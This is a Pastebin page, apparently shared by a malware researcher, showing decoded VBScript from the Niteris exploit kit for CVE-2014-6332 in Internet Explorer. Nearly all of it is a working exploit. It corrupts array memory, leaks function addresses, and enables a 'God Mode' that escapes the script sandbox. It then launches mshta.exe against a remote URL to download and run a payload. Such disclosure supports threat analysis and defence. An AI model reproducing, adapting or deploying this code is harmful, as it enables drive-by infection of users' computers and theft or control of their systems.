API tools faq
paste
Advertisement
Kafeine

Niteris_CVE-2014-6332_after_JS_VBS_decoding

Kafeine
May 12th, 2015
652
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 2.19 KB | None | 0 0
raw download clone embed print report
  1. SetLocale(1033)
  2. dim arrX(),arrY(),asize,incsize,olapPos,oFSO,oWS,shell,t
  3. Begin()
  4. Sub runshell()
  5. Set oFSO = CreateObject("Scripting.FileSystemObject")
  6. Set oWS = CreateObject("WScript.Shell")
  7.  
  8. Set shell = CreateObject("Shell.Application")
  9. t=oWS.ExpandEnvironmentStrings("%tmp%")
  10. if InStr(1,t,"Low")=0 then
  11. shell.ShellExecute "mshta.exe", "http://pezuvupeb.browser-filters.pw:443/forum/list/5/WYLRFWIK/f4fd8770821b16a5f4df13e89191cefd", "", "", 0
  12. end if
  13. End Sub
  14.  
  15. function Begin()
  16. On Error Resume Next
  17.  
  18. Init()
  19. If Exploit() = True Then
  20. EnableGodMode()
  21. redim Preserve arrX(asize)
  22. runshell()
  23. End If
  24. end function
  25.  
  26. function Init()
  27. Randomize()
  28. asize = 13 + 17*rnd(6)
  29. incsize = 7 + 3*rnd(5)
  30. end function
  31.  
  32. function Exploit()
  33. Exploit = False
  34. For i = 0 To 400
  35. asize = asize + incsize
  36. If Trigger() = True Then
  37. Exploit = True
  38. Exit For
  39. End If
  40. Next
  41. end function
  42.  
  43. function Trigger()
  44. On Error Resume Next
  45. Trigger = False
  46. olapPos = asize + 2
  47. ofnumele = asize + &h8000000
  48.  
  49. redim Preserve arrX(asize*2+1)
  50. redim Preserve arrX(asize)
  51. redim arrY(asize)
  52. redim Preserve arrX(ofnumele)
  53.  
  54. typev = 1
  55. arrY(0) = 1.123456789012345678901234567890
  56.  
  57. If (IsObject(arrX(olapPos-1)) = False) Then
  58. If (VarType(arrX(olapPos-1)) <> 0) Then
  59. If (IsObject(arrX(olapPos)) = False) Then
  60. typev = VarType(arrX(olapPos))
  61. End If
  62. End If
  63. End If
  64.  
  65. arrY(0) = 0.0
  66. If (typev = &h2f66) And (VarType(arrX(olapPos)) = 0) Then
  67. Trigger = True
  68. Else
  69. redim Preserve arrX(asize)
  70. End If
  71. end function
  72.  
  73. function ReadMemInt(addr)
  74. arrY(0) = 0
  75. arrX(olapPos) = addr+4
  76. arrY(0) = 8
  77. ReadMemInt = lenb(arrX(olapPos))
  78. end function
  79.  
  80. function EnableGodMode()
  81. i = LeakFnAddr()
  82. i = ReadMemInt(i+8)
  83. i = ReadMemInt(i+16)
  84.  
  85. myarray = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uFFFF%u7FFF%u0000%u0000")
  86. arrX(olapPos+2) = myarray
  87. arrY(2) = 8192 + 12
  88.  
  89. EnableGodMode = False
  90. For k=0 To &h60 step 4
  91. j = ReadMemInt(i+&h120+k)
  92. If (j = 14) Then
  93. arrX(olapPos+2)(i+&h11c+k) = arrY(4)
  94. EnableGodMode = True
  95. Exit For
  96. End If
  97. Next
  98. end function
  99.  
  100. sub dummyfn()
  101. end sub
  102.  
  103. function LeakFnAddr()
  104. On Error Resume Next
  105. i = dummyfn
  106. i = null
  107. arrY(0) = 0
  108. arrX(olapPos) = i
  109. arrY(0) = 3
  110. LeakFnAddr = arrX(olapPos)
  111. end function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!